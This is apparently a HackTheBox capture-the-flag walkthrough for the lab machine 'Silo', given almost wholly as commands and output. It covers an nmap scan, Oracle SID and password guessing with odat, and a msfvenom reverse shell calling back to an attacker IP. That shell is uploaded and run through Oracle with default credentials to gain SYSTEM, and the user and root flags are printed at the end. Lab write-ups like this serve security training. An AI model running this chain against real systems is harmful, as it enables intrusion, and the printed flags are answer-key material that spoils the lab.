HackTheBox Silo

$ /opt/nmapAutomator/nmapAutomator.sh -H 10.10.10.82 -t Full

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC                                            
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn                                    
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds             
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)                    
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4m34s, deviation: 0s, median: 4m34s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-06-01T10:05:35
|_  start_date: 2021-06-01T09:57:54

$ nmap -Pn -sT --script=+oracle-tns-poison -p 1521 10.10.10.82
PORT     STATE SERVICE
1521/tcp open  oracle
|_oracle-tns-poison: Host is vulnerable!

$ ./odat-libc2.12-x86_64 sidguesser -s 10.10.10.82 -p 1521
[+] SIDs found on the 10.10.10.82:1521 server: XE
$ wget https://raw.githubusercontent.com/quentinhardy/odat/master-python3/accounts/accounts.txt

./odat-libc2.12-x86_64 passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file accounts.txt

$ msfvenom -p windows/x64/shell/reverse_tcp LHOST=10.10.14.6 LPORT=1234 -f exe -o shell.exe
$ ./odat-libc2.12-x86_64 utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ shell.exe shell.exe
[1] (10.10.10.82:1521): Put the shell.exe local file in the c:/ folder like shell.exe on the 10.10.10.82 server                                                                             
[+] The shell.exe file was created on the c:/ directory on the 10.10.10.82 server like the shell.exe file
$ msconsole
$ ./odat-libc2.12-x86_64 externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec C:/ shell.exe

> whoami
nt authority\system
6. C:\Users\Phineas\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.82
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{50CD6E47-E5C7-44A8-B294-BA01E18B9E30}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
C:\Users\Phineas\Desktop>type user.txt
92ede778a1cc8d27cb6623055c331617
7. C:\Users\Administrator\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.82
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{50CD6E47-E5C7-44A8-B294-BA01E18B9E30}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
C:\Users\Administrator\Desktop>type root.txt
cd39ea0af657a495e33bc59c7836faf6